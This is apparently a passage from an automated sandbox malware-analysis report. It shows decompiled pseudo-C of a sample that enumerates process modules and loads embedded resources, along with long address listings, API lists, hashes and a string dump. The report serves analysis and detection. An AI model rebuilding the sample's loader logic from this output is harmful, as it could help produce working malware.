																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

































































































                                                                                                                                                                                          0x004019f0
                                                                                                                                                                                          0x004019f0
                                                                                                                                                                                          0x004019fd
                                                                                                                                                                                          0x00401a10
                                                                                                                                                                                          0x00401a15
                                                                                                                                                                                          0x00401a1a
                                                                                                                                                                                          0x00401a1f
                                                                                                                                                                                          0x00401a24
                                                                                                                                                                                          0x00401a29
                                                                                                                                                                                          0x00401a2e
                                                                                                                                                                                          0x00401a33
                                                                                                                                                                                          0x00401a38
                                                                                                                                                                                          0x00401a3d
                                                                                                                                                                                          0x00401a42
                                                                                                                                                                                          0x00401a47
                                                                                                                                                                                          0x00401a4c
                                                                                                                                                                                          0x00401a51
                                                                                                                                                                                          0x00401a56
                                                                                                                                                                                          0x00401a5b
                                                                                                                                                                                          0x00401a60
                                                                                                                                                                                          0x00401a65
                                                                                                                                                                                          0x00401a6a
                                                                                                                                                                                          0x00401a6f
                                                                                                                                                                                          0x00401a74
                                                                                                                                                                                          0x00401a79
                                                                                                                                                                                          0x00401a7e
                                                                                                                                                                                          0x00401a83
                                                                                                                                                                                          0x00401a88
                                                                                                                                                                                          0x00401a8d
                                                                                                                                                                                          0x00401a92
                                                                                                                                                                                          0x00401a97
                                                                                                                                                                                          0x00401a9c
                                                                                                                                                                                          0x00401aa1
                                                                                                                                                                                          0x00401aa6
                                                                                                                                                                                          0x00401aab
                                                                                                                                                                                          0x00401ab0
                                                                                                                                                                                          0x00401ab9
                                                                                                                                                                                          0x00401aba
                                                                                                                                                                                          0x00401abf
                                                                                                                                                                                          0x00401ac7
                                                                                                                                                                                          0x0040248d
                                                                                                                                                                                          0x0040248d
                                                                                                                                                                                          0x00402496
                                                                                                                                                                                          0x00401acd
                                                                                                                                                                                          0x00401ad6
                                                                                                                                                                                          0x00401ae2
                                                                                                                                                                                          0x00401ae6
                                                                                                                                                                                          0x00401af1
                                                                                                                                                                                          0x00401af6
                                                                                                                                                                                          0x00401afb
                                                                                                                                                                                          0x00401b00
                                                                                                                                                                                          0x00401b05
                                                                                                                                                                                          0x00401b0a
                                                                                                                                                                                          0x00401b0f
                                                                                                                                                                                          0x00401b14
                                                                                                                                                                                          0x00401b19
                                                                                                                                                                                          0x00401b1e
                                                                                                                                                                                          0x00401b23
                                                                                                                                                                                          0x00401b28
                                                                                                                                                                                          0x00401b2d
                                                                                                                                                                                          0x00401b32
                                                                                                                                                                                          0x00401b37
                                                                                                                                                                                          0x00401b3c
                                                                                                                                                                                          0x00401b41
                                                                                                                                                                                          0x00401b46
                                                                                                                                                                                          0x00401b4b
                                                                                                                                                                                          0x00401b50
                                                                                                                                                                                          0x00401b55
                                                                                                                                                                                          0x00401b5a
                                                                                                                                                                                          0x00401b5f
                                                                                                                                                                                          0x00401b64
                                                                                                                                                                                          0x00401b69
                                                                                                                                                                                          0x00401b6e
                                                                                                                                                                                          0x00401b73
                                                                                                                                                                                          0x00401b78
                                                                                                                                                                                          0x00401b7d
                                                                                                                                                                                          0x00401b85
                                                                                                                                                                                          0x00401b8d
                                                                                                                                                                                          0x00401b95
                                                                                                                                                                                          0x00401b9d
                                                                                                                                                                                          0x00401ba4
                                                                                                                                                                                          0x00401ba9
                                                                                                                                                                                          0x00401bae
                                                                                                                                                                                          0x00401bb3
                                                                                                                                                                                          0x00401bb8
                                                                                                                                                                                          0x00401bbd
                                                                                                                                                                                          0x00401bc2
                                                                                                                                                                                          0x00401bc7
                                                                                                                                                                                          0x00401bcc
                                                                                                                                                                                          0x00401bd1
                                                                                                                                                                                          0x00401bd6
                                                                                                                                                                                          0x00401bdb
                                                                                                                                                                                          0x00401be0
                                                                                                                                                                                          0x00401be5
                                                                                                                                                                                          0x00401bea
                                                                                                                                                                                          0x00401bef
                                                                                                                                                                                          0x00401bf4
                                                                                                                                                                                          0x00401bf9
                                                                                                                                                                                          0x00401bfe
                                                                                                                                                                                          0x00401c03
                                                                                                                                                                                          0x00401c08
                                                                                                                                                                                          0x00401c0d
                                                                                                                                                                                          0x00401c12
                                                                                                                                                                                          0x00401c17
                                                                                                                                                                                          0x00401c1c
                                                                                                                                                                                          0x00401c21
                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                          0x00401c30
                                                                                                                                                                                          0x00401c35
                                                                                                                                                                                          0x00401c3a
                                                                                                                                                                                          0x00401c3f
                                                                                                                                                                                          0x00401c44
                                                                                                                                                                                          0x00401c48
                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                          0x00401dc3
                                                                                                                                                                                          0x00401dc4
                                                                                                                                                                                          0x00401de0
                                                                                                                                                                                          0x00401de2
                                                                                                                                                                                          0x00401de7
                                                                                                                                                                                          0x00401dec
                                                                                                                                                                                          0x00401df1
                                                                                                                                                                                          0x00401df6
                                                                                                                                                                                          0x00401dfb
                                                                                                                                                                                          0x00401e00
                                                                                                                                                                                          0x00401e05
                                                                                                                                                                                          0x00401e0a
                                                                                                                                                                                          0x00401e0f
                                                                                                                                                                                          0x00401e14
                                                                                                                                                                                          0x00401e19
                                                                                                                                                                                          0x00401e1e
                                                                                                                                                                                          0x00401e23
                                                                                                                                                                                          0x00401e28
                                                                                                                                                                                          0x00401e2d
                                                                                                                                                                                          0x00401e32
                                                                                                                                                                                          0x00401e37
                                                                                                                                                                                          0x00401e3c
                                                                                                                                                                                          0x00401e41
                                                                                                                                                                                          0x00401e46
                                                                                                                                                                                          0x00401e4b
                                                                                                                                                                                          0x00401e50
                                                                                                                                                                                          0x00401e55
                                                                                                                                                                                          0x00401e5a
                                                                                                                                                                                          0x00401e5f
                                                                                                                                                                                          0x00401e64
                                                                                                                                                                                          0x00401e69
                                                                                                                                                                                          0x00401e6e
                                                                                                                                                                                          0x00401e73
                                                                                                                                                                                          0x00401e78
                                                                                                                                                                                          0x00401e7d
                                                                                                                                                                                          0x00401e82
                                                                                                                                                                                          0x00401e86
                                                                                                                                                                                          0x00401e8b
                                                                                                                                                                                          0x00401e96
                                                                                                                                                                                          0x00401e9a
                                                                                                                                                                                          0x00401ea4
                                                                                                                                                                                          0x00401eaf
                                                                                                                                                                                          0x00401eba
                                                                                                                                                                                          0x00401ebf
                                                                                                                                                                                          0x00401ec4
                                                                                                                                                                                          0x00401ec6
                                                                                                                                                                                          0x00401ecb
                                                                                                                                                                                          0x00401ece
                                                                                                                                                                                          0x00401ed2
                                                                                                                                                                                          0x00401ed4
                                                                                                                                                                                          0x00401eef
                                                                                                                                                                                          0x00401ed6
                                                                                                                                                                                          0x00401edd
                                                                                                                                                                                          0x00401ee2
                                                                                                                                                                                          0x00401ee6
                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                          0x00401ef7
                                                                                                                                                                                          0x00401efc
                                                                                                                                                                                          0x00401f02
                                                                                                                                                                                          0x00401f08
                                                                                                                                                                                          0x00401f0c
                                                                                                                                                                                          0x00401f15
                                                                                                                                                                                          0x00401f18
                                                                                                                                                                                          0x00401f1a
                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                          0x00401f24
                                                                                                                                                                                          0x00401f28
                                                                                                                                                                                          0x00401f2f
                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                          0x00401f40
                                                                                                                                                                                          0x00401f45
                                                                                                                                                                                          0x00401f4a
                                                                                                                                                                                          0x00401f4b
                                                                                                                                                                                          0x00401f50
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                          0x00401f69
                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                          0x00401f73
                                                                                                                                                                                          0x00401f75
                                                                                                                                                                                          0x00401f7b
                                                                                                                                                                                          0x00401f80
                                                                                                                                                                                          0x00401f81
                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                          0x00401f8c
                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                          0x00401f9d
                                                                                                                                                                                          0x00401fa2
                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                          0x00401fac
                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                          0x00401fb6
                                                                                                                                                                                          0x00401fbf
                                                                                                                                                                                          0x00401fc4
                                                                                                                                                                                          0x00401fc8
                                                                                                                                                                                          0x00401fce
                                                                                                                                                                                          0x00401fd3
                                                                                                                                                                                          0x00401fe0
                                                                                                                                                                                          0x00401fec
                                                                                                                                                                                          0x00401ffe
                                                                                                                                                                                          0x00402001
                                                                                                                                                                                          0x00402006
                                                                                                                                                                                          0x0040200b
                                                                                                                                                                                          0x00402010
                                                                                                                                                                                          0x00402015
                                                                                                                                                                                          0x0040201a
                                                                                                                                                                                          0x0040201f
                                                                                                                                                                                          0x00402024
                                                                                                                                                                                          0x00402029
                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                          0x00402033
                                                                                                                                                                                          0x00402038
                                                                                                                                                                                          0x0040203d
                                                                                                                                                                                          0x00402042
                                                                                                                                                                                          0x00402047
                                                                                                                                                                                          0x0040204c
                                                                                                                                                                                          0x00402051
                                                                                                                                                                                          0x00402056
                                                                                                                                                                                          0x0040205b
                                                                                                                                                                                          0x00402060
                                                                                                                                                                                          0x00402065
                                                                                                                                                                                          0x0040206a
                                                                                                                                                                                          0x0040206f
                                                                                                                                                                                          0x00402074
                                                                                                                                                                                          0x00402079
                                                                                                                                                                                          0x0040207e
                                                                                                                                                                                          0x00402083
                                                                                                                                                                                          0x00402088
                                                                                                                                                                                          0x0040208d
                                                                                                                                                                                          0x00402092
                                                                                                                                                                                          0x00402097
                                                                                                                                                                                          0x0040209c
                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                          0x004020a5
                                                                                                                                                                                          0x004020aa
                                                                                                                                                                                          0x004020ae
                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                          0x004020b6
                                                                                                                                                                                          0x004020bb
                                                                                                                                                                                          0x004020c0
                                                                                                                                                                                          0x004020c5
                                                                                                                                                                                          0x004020ca
                                                                                                                                                                                          0x004020cf
                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                          0x004020e1
                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                          0x004020eb
                                                                                                                                                                                          0x004020f0
                                                                                                                                                                                          0x004020f5
                                                                                                                                                                                          0x004020fa
                                                                                                                                                                                          0x004020ff
                                                                                                                                                                                          0x00402104
                                                                                                                                                                                          0x00402109
                                                                                                                                                                                          0x0040210e
                                                                                                                                                                                          0x00402113
                                                                                                                                                                                          0x00402118
                                                                                                                                                                                          0x0040211d
                                                                                                                                                                                          0x00402122
                                                                                                                                                                                          0x00402127
                                                                                                                                                                                          0x0040212c
                                                                                                                                                                                          0x00402131
                                                                                                                                                                                          0x00402136
                                                                                                                                                                                          0x0040213b
                                                                                                                                                                                          0x00402140
                                                                                                                                                                                          0x00402145
                                                                                                                                                                                          0x0040214a
                                                                                                                                                                                          0x0040214f
                                                                                                                                                                                          0x00402154
                                                                                                                                                                                          0x00402159
                                                                                                                                                                                          0x0040215e
                                                                                                                                                                                          0x00402163
                                                                                                                                                                                          0x00402167
                                                                                                                                                                                          0x0040216c
                                                                                                                                                                                          0x00402171
                                                                                                                                                                                          0x00402177
                                                                                                                                                                                          0x00402179
                                                                                                                                                                                          0x0040217c
                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                          0x00402183
                                                                                                                                                                                          0x00402188
                                                                                                                                                                                          0x0040218f
                                                                                                                                                                                          0x00402196
                                                                                                                                                                                          0x0040219a
                                                                                                                                                                                          0x0040219e
                                                                                                                                                                                          0x004021a2
                                                                                                                                                                                          0x004021a4
                                                                                                                                                                                          0x004021bc
                                                                                                                                                                                          0x004021be
                                                                                                                                                                                          0x004021c0
                                                                                                                                                                                          0x004021c6
                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                          0x004021ec
                                                                                                                                                                                          0x004021f1
                                                                                                                                                                                          0x00402213
                                                                                                                                                                                          0x00402215
                                                                                                                                                                                          0x00402217
                                                                                                                                                                                          0x0040221d
                                                                                                                                                                                          0x00402239
                                                                                                                                                                                          0x0040223b
                                                                                                                                                                                          0x0040223d
                                                                                                                                                                                          0x00402243
                                                                                                                                                                                          0x0040224d
                                                                                                                                                                                          0x0040224f
                                                                                                                                                                                          0x00402251
                                                                                                                                                                                          0x00402260
                                                                                                                                                                                          0x00402264
                                                                                                                                                                                          0x00402269
                                                                                                                                                                                          0x00402277
                                                                                                                                                                                          0x0040227b
                                                                                                                                                                                          0x00402286
                                                                                                                                                                                          0x00402293
                                                                                                                                                                                          0x004022af
                                                                                                                                                                                          0x004022b1
                                                                                                                                                                                          0x004022b5
                                                                                                                                                                                          0x004022b7
                                                                                                                                                                                          0x004022be
                                                                                                                                                                                          0x004022be
                                                                                                                                                                                          0x004022d7
                                                                                                                                                                                          0x004022e8
                                                                                                                                                                                          0x004022ef
                                                                                                                                                                                          0x004022f6
                                                                                                                                                                                          0x00402300
                                                                                                                                                                                          0x00402304
                                                                                                                                                                                          0x00402308
                                                                                                                                                                                          0x00402315
                                                                                                                                                                                          0x0040231a
                                                                                                                                                                                          0x0040231e
                                                                                                                                                                                          0x00402324
                                                                                                                                                                                          0x00402328
                                                                                                                                                                                          0x0040232a
                                                                                                                                                                                          0x00402331
                                                                                                                                                                                          0x00402331
                                                                                                                                                                                          0x0040234e
                                                                                                                                                                                          0x00402350
                                                                                                                                                                                          0x00402352
                                                                                                                                                                                          0x00402355
                                                                                                                                                                                          0x00402355
                                                                                                                                                                                          0x0040235b
                                                                                                                                                                                          0x0040235f
                                                                                                                                                                                          0x00402361
                                                                                                                                                                                          0x00402368
                                                                                                                                                                                          0x00402368
                                                                                                                                                                                          0x0040236d
                                                                                                                                                                                          0x00402371
                                                                                                                                                                                          0x00402373
                                                                                                                                                                                          0x00402375
                                                                                                                                                                                          0x0040237b
                                                                                                                                                                                          0x0040237b
                                                                                                                                                                                          0x00402377
                                                                                                                                                                                          0x00402377
                                                                                                                                                                                          0x00402377
                                                                                                                                                                                          0x00402390
                                                                                                                                                                                          0x00402396
                                                                                                                                                                                          0x0040239c
                                                                                                                                                                                          0x004023a0
                                                                                                                                                                                          0x004023a2
                                                                                                                                                                                          0x004023a9
                                                                                                                                                                                          0x004023a9
                                                                                                                                                                                          0x004023ae
                                                                                                                                                                                          0x004023b2
                                                                                                                                                                                          0x004023b4
                                                                                                                                                                                          0x004023ba
                                                                                                                                                                                          0x004023ba
                                                                                                                                                                                          0x004023b6
                                                                                                                                                                                          0x004023b6
                                                                                                                                                                                          0x004023b6
                                                                                                                                                                                          0x004023ce
                                                                                                                                                                                          0x004023d1
                                                                                                                                                                                          0x004023d3
                                                                                                                                                                                          0x004023dd
                                                                                                                                                                                          0x004023ec
                                                                                                                                                                                          0x004023ef
                                                                                                                                                                                          0x004023fe
                                                                                                                                                                                          0x00402401
                                                                                                                                                                                          0x00402403
                                                                                                                                                                                          0x00402411
                                                                                                                                                                                          0x00402417
                                                                                                                                                                                          0x00402424
                                                                                                                                                                                          0x00402426
                                                                                                                                                                                          0x0040242a
                                                                                                                                                                                          0x0040242c
                                                                                                                                                                                          0x00402434
                                                                                                                                                                                          0x00402434
                                                                                                                                                                                          0x0040243a
                                                                                                                                                                                          0x0040243f
                                                                                                                                                                                          0x00402443
                                                                                                                                                                                          0x00402445
                                                                                                                                                                                          0x0040244d
                                                                                                                                                                                          0x0040244d
                                                                                                                                                                                          0x00402445
                                                                                                                                                                                          0x00402251
                                                                                                                                                                                          0x0040223d
                                                                                                                                                                                          0x0040244f
                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                          0x0040245f
                                                                                                                                                                                          0x00402461
                                                                                                                                                                                          0x00402462
                                                                                                                                                                                          0x00402467
                                                                                                                                                                                          0x00402467
                                                                                                                                                                                          0x0040245f
                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                          0x0040246a
                                                                                                                                                                                          0x0040246e
                                                                                                                                                                                          0x00402470
                                                                                                                                                                                          0x00402478
                                                                                                                                                                                          0x00402478
                                                                                                                                                                                          0x0040247a
                                                                                                                                                                                          0x0040247e
                                                                                                                                                                                          0x00402480
                                                                                                                                                                                          0x00402488
                                                                                                                                                                                          0x00402488
                                                                                                                                                                                          0x00402480
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c55
                                                                                                                                                                                          0x00401c62
                                                                                                                                                                                          0x00401c67
                                                                                                                                                                                          0x00401c6a
                                                                                                                                                                                          0x00401c6c
                                                                                                                                                                                          0x00401c73
                                                                                                                                                                                          0x00401c73
                                                                                                                                                                                          0x00401c77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c7b
                                                                                                                                                                                          0x00401c8f
                                                                                                                                                                                          0x00401c8f
                                                                                                                                                                                          0x00401c7d
                                                                                                                                                                                          0x00401c7d
                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c85
                                                                                                                                                                                          0x00401c85
                                                                                                                                                                                          0x00401c88
                                                                                                                                                                                          0x00401c8d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c8d
                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                          0x00401c98
                                                                                                                                                                                          0x00401c9a
                                                                                                                                                                                          0x00401cbd
                                                                                                                                                                                          0x00401cc2
                                                                                                                                                                                          0x00401cc5
                                                                                                                                                                                          0x00401cc7
                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                          0x00401cd2
                                                                                                                                                                                          0x00401cd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cd6
                                                                                                                                                                                          0x00401cd8
                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                          0x00401cdd
                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                          0x00401ce5
                                                                                                                                                                                          0x00401ce8
                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cf9
                                                                                                                                                                                          0x00401d02
                                                                                                                                                                                          0x00401d07
                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                          0x00401d1d
                                                                                                                                                                                          0x00401d22
                                                                                                                                                                                          0x00401d25
                                                                                                                                                                                          0x00401d27
                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                          0x00401d32
                                                                                                                                                                                          0x00401d34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d36
                                                                                                                                                                                          0x00401d38
                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                          0x00401d3d
                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                          0x00401d45
                                                                                                                                                                                          0x00401d48
                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d5d
                                                                                                                                                                                          0x00401d6a
                                                                                                                                                                                          0x00401d6f
                                                                                                                                                                                          0x00401d72
                                                                                                                                                                                          0x00401d74
                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                          0x00401d82
                                                                                                                                                                                          0x00401d84
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d86
                                                                                                                                                                                          0x00401d88
                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                          0x00401d8d
                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                          0x00401d95
                                                                                                                                                                                          0x00401d98
                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                          0x00401da0
                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                          0x00401d50
                                                                                                                                                                                          0x00401d52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401dad
                                                                                                                                                                                          0x00401db6
                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                          0x00401cf0
                                                                                                                                                                                          0x00401cf2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c9c
                                                                                                                                                                                          0x00401c9c
                                                                                                                                                                                          0x00401c9d
                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c9a
                                                                                                                                                                                          0x00401c93
                                                                                                                                                                                          0x00401c95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c95
                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                          • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                          • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPXs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                          • API String ID: 2366190142-2853427038
                                                                                                                                                                                          • Opcode ID: 135b7a2c8b10f9b65b3a7f6fe368769bd920b2b492654d20624e3bc9a208dfdf
                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 135b7a2c8b10f9b65b3a7f6fe368769bd920b2b492654d20624e3bc9a208dfdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}











                                                                                                                                                                                          0x004018f0
                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                          0x004018f6
                                                                                                                                                                                          0x004018fa
                                                                                                                                                                                          0x00401917
                                                                                                                                                                                          0x0040191a
                                                                                                                                                                                          0x0040192f
                                                                                                                                                                                          0x00401939
                                                                                                                                                                                          0x0040193b
                                                                                                                                                                                          0x0040193e
                                                                                                                                                                                          0x00401940
                                                                                                                                                                                          0x00401949
                                                                                                                                                                                          0x0040195e
                                                                                                                                                                                          0x0040196b
                                                                                                                                                                                          0x00401980
                                                                                                                                                                                          0x0040198a
                                                                                                                                                                                          0x0040198c
                                                                                                                                                                                          0x0040198c
                                                                                                                                                                                          0x0040198f
                                                                                                                                                                                          0x00401991
                                                                                                                                                                                          0x00401991
                                                                                                                                                                                          0x0040198f
                                                                                                                                                                                          0x0040199a
                                                                                                                                                                                          0x004018fc
                                                                                                                                                                                          0x004018fc
                                                                                                                                                                                          0x00401900
                                                                                                                                                                                          0x00401900

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
